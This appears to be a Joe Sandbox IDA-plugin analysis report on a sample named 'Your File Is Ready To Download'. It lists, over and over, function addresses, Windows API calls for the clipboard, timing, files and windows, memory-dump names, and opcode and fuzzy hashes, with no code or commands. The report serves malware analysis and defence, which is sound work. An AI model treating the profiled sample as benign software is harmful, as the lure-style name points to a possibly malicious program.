Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 00fc2304d229a3032f049def107d4e6cc6f5c3b42ca53d7b5ab05cd9c98edb10
Instruction ID: bed8c28f9f296cbb1d67ccc1dc5083405c51ed8b04b031b0fa804075a83e5092
Opcode Fuzzy Hash: 00fc2304d229a3032f049def107d4e6cc6f5c3b42ca53d7b5ab05cd9c98edb10
Instruction Fuzzy Hash: 5AA12A31605B408AEB6B8B26E8843EA77A1F74DBD4F544116EF5947BF5DB38C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036A82, Relevance: 9.2, APIs: 6, Instructions: 192windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: 54d0b1db7bffe2e0cd29d103faed9f68c3fafdcf8c14e3113f540463e6cc8ad6
Instruction ID: 4aa8d6cad3e8e025e5e5d240b85dbf95f0ee42f256678761492fc8c76976d56e
Opcode Fuzzy Hash: 54d0b1db7bffe2e0cd29d103faed9f68c3fafdcf8c14e3113f540463e6cc8ad6
Instruction Fuzzy Hash: 7AA14D31604B4086FB6B8B27E8443DA77A2F78DBE4F548215EB99476F5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036F52, Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 1ffc8ea5225fa0c41bae7347a047f40202f63e74b51d7090873bfd12d0df613c
Instruction ID: cb26c9610103a84e913e711e836586210fde9999bcd78beaf9ec505941a5f9af
Opcode Fuzzy Hash: 1ffc8ea5225fa0c41bae7347a047f40202f63e74b51d7090873bfd12d0df613c
Instruction Fuzzy Hash: 29915A31604B408AFB6B8B27A8443EA77A2F78DBD4F544116FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140034FA3, Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 0ce58c75bbe04b905a06aeed021ed09ecec8e92b4c90749eecc88ecb75f3748a
Instruction ID: 97e4ff4785ac50c19b6896ce58c0ef1cf1a3e0cdbb4e699bad28e3ed79c10317
Opcode Fuzzy Hash: 0ce58c75bbe04b905a06aeed021ed09ecec8e92b4c90749eecc88ecb75f3748a
Instruction Fuzzy Hash: 0F915B31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140034F56, Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f80169d563adbaea3e3cf83213dd5a6b89404a6ca147df97d5a9a2034419e818
Instruction ID: 5099e202afadc46a452fbdd17e35c61f2b59f7ddcdd30510c425b883bf64700d
Opcode Fuzzy Hash: f80169d563adbaea3e3cf83213dd5a6b89404a6ca147df97d5a9a2034419e818
Instruction Fuzzy Hash: 1E914A31604B408AFB6B8B27A8443EA77A2B78DBD4F544116FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037138, Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080A7C
Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AC1
Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AF9
Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B35
Part of subcall function 0000000140080A40: FindFirstFileW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B76
Part of subcall function 0000000140080A40: GetLastError.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B85

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountFileTick$AttributesFullNamePath$ClipboardCloseErrorFindFirstGlobalLastMessagePeekUnlock
String ID:
API String ID: 3916726430-0
Opcode ID: 8a6a50b7d653cc71d262e5e5cf81e4392e1ff8df1731e7381873aed8753e1e0e
Instruction ID: 5c9f389f4de825d9878a32ea04cf4a77650ad829795e2768e3d97d42a5181c46
Opcode Fuzzy Hash: 8a6a50b7d653cc71d262e5e5cf81e4392e1ff8df1731e7381873aed8753e1e0e
Instruction Fuzzy Hash: EF914831604B4086FB6B8B27E8543EA77A2F78DBD4F544116EB5A87AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036C5D, Relevance: 9.2, APIs: 6, Instructions: 186windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 53115dc2f6055d8bf11e2698de0baaf7388d09995e6b2621ae8597dd8afe4414
Instruction ID: 98e21afc365e414883ed4f26097a1f7e797a4aa5238aaba5745ba577ee77ce72
Opcode Fuzzy Hash: 53115dc2f6055d8bf11e2698de0baaf7388d09995e6b2621ae8597dd8afe4414
Instruction Fuzzy Hash: 4A914831600B4086FB6B8B27A8443EA67A2E78DBD4F544116EB5947AF6DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400372BC, Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Part of subcall function 0000000140080940: RemoveDirectoryW.KERNEL32 ref: 000000014008094B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseDirectoryGlobalMessagePeekRemoveUnlock
String ID:
API String ID: 1863380684-0
Opcode ID: b7ed998e9cf5bbaa42163194383001ed15e42097439c6ec71cfe868c951cd7ec
Instruction ID: 403bce549ffaadd3b96ec6fac61f3b6c643744719f12cf57c0f3a7dd73ca13d0
Opcode Fuzzy Hash: b7ed998e9cf5bbaa42163194383001ed15e42097439c6ec71cfe868c951cd7ec
Instruction Fuzzy Hash: 1D915931604B4086FB6B8B27A8443EA77A2B78DBD4F544116FB5987AF6DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003638C, Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004A740: GetWindowRect.USER32 ref: 000000014004A831
Part of subcall function 000000014004A740: GetWindowRect.USER32 ref: 000000014004A866
Part of subcall function 000000014004A740: GetParent.USER32 ref: 000000014004A895
Part of subcall function 000000014004A740: ScreenToClient.USER32 ref: 000000014004A8AB

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$RectWindow$ClientClipboardCloseGlobalMessageParentPeekScreenUnlock
String ID:
API String ID: 1625120959-0
Opcode ID: c8a7ee879b48b2ec7b0480daebcb0192a30f2a69fd74caba8c10a8c3583dfb64
Instruction ID: 6058890c046a82a14f497ed60f86a1f8cb736b17547c07c46e52349af7b944a6
Opcode Fuzzy Hash: c8a7ee879b48b2ec7b0480daebcb0192a30f2a69fd74caba8c10a8c3583dfb64
Instruction Fuzzy Hash: 52913831604B4486EB6B8B27E8443DA77A2F78DBD4F544116EB9987BF5DB39C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035B17, Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B0AF0: GetForegroundWindow.USER32 ref: 00000001400B0B48
Part of subcall function 00000001400B0AF0: IsWindowVisible.USER32 ref: 00000001400B0B62
Part of subcall function 00000001400B0AF0: IsIconic.USER32 ref: 00000001400B0B7B
Part of subcall function 00000001400B0AF0: ShowWindow.USER32 ref: 00000001400B0B8D

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTickWindow$ClipboardCloseForegroundGlobalIconicMessagePeekShowUnlockVisible
String ID:
API String ID: 1891409732-0
Opcode ID: 0465e4a95f92ed67ccb7e4f578d12c75a3b0872968327a44c31614cdc7bac2e4
Instruction ID: 3e954db6ac7355a0dbe133a97fa94425093ccbcf169e0c9639670f2e08053b37
Opcode Fuzzy Hash: 0465e4a95f92ed67ccb7e4f578d12c75a3b0872968327a44c31614cdc7bac2e4
Instruction Fuzzy Hash: 08913A31604B4086FB6B8B27A8543EA77A1F78DBE4F544216FB5A47AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400371C6, Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400806A0: GetFullPathNameW.KERNEL32 ref: 00000001400806F1
Part of subcall function 00000001400806A0: GetFullPathNameW.KERNEL32 ref: 0000000140080734
Part of subcall function 00000001400806A0: GetFileAttributesW.KERNEL32 ref: 000000014008076A

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$FullNamePath$AttributesClipboardCloseFileGlobalMessagePeekUnlock
String ID:
API String ID: 1989334333-0
Opcode ID: f8bb2da6540411c1b82a694d2a3b746ed80d84e8c7036d342ca8570873a50bb0
Instruction ID: 76f2ecb1062d5dcedf52178b25f13d14acaa9c603a1a73c68c5d17501603a671
Opcode Fuzzy Hash: f8bb2da6540411c1b82a694d2a3b746ed80d84e8c7036d342ca8570873a50bb0
Instruction Fuzzy Hash: 33915931604B4086FB6B8B27A8543EA77A2F78DBD4F544116FB5A87AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036290, Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: db4ee09c7023b87c287fc6a20000f74ffeff2ebaee8e54b4a3b864779c5b6335
Instruction ID: ecd1b036ee722e715201a1e110facc4cb23219e1f20d30456fb2ce1751f69542
Opcode Fuzzy Hash: db4ee09c7023b87c287fc6a20000f74ffeff2ebaee8e54b4a3b864779c5b6335
Instruction Fuzzy Hash: 64912971604B408AFB6B8B27E8443DA77A2F78DBE4F544116EB59876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400336B3, Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ee2bf2d2c024c568236b69f1599bb920f43235cf0abb5fd710fd05255e6c37ef
Instruction ID: 39895a4f2c7261bd753653019f1ebd794d74b76e992f4fe1f840a2f045a6e7e3
Opcode Fuzzy Hash: ee2bf2d2c024c568236b69f1599bb920f43235cf0abb5fd710fd05255e6c37ef
Instruction Fuzzy Hash: D3918E32604B4486FB6B8B2AA8443EA77A1FB8DBE4F544215EF59476F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003617C, Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140049780: GetWindowRect.USER32 ref: 00000001400497BF
Part of subcall function 0000000140049780: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400361D0), ref: 00000001400498A3

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
String ID:
API String ID: 1284534901-0
Opcode ID: 56a85a025b80bd6e0c17e0f922f6a0556dc46b6fb9a515dd913b0abd341d0c21
Instruction ID: 87f8e470e84c9d3b49cf766c51b98ce5622bf8921297aef2a873994146d078ba
Opcode Fuzzy Hash: 56a85a025b80bd6e0c17e0f922f6a0556dc46b6fb9a515dd913b0abd341d0c21
Instruction Fuzzy Hash: C4913831604B4086EB6B8B27E8443DA77A2F78DBE4F544116EB9987BF5DB39C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037182, Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080A7C
Part of subcall function 0000000140080A40: GetFullPathNameW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AC1
Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080AF9
Part of subcall function 0000000140080A40: GetFileAttributesW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B35
Part of subcall function 0000000140080A40: FindFirstFileW.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B76
Part of subcall function 0000000140080A40: GetLastError.KERNEL32(?,?,?,?,?,000000014003716B), ref: 0000000140080B85

Part of subcall function 000000014003F460: _itow.LIBCMT ref: 000000014003F48E

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountFileTick$AttributesFullNamePath$ClipboardCloseErrorFindFirstGlobalLastMessagePeekUnlock_itow
String ID:
API String ID: 446227350-0
Opcode ID: b31bdc009e76ca0c2f6435cdb588670db79906b9cdb1e3206094a39acf3bf635
Instruction ID: d3fde14aa1f17386e64b1472ea3c9bb8c40fc715db2735754d768e4e5ed69fda
Opcode Fuzzy Hash: b31bdc009e76ca0c2f6435cdb588670db79906b9cdb1e3206094a39acf3bf635
Instruction Fuzzy Hash: 6F914831604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036518, Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
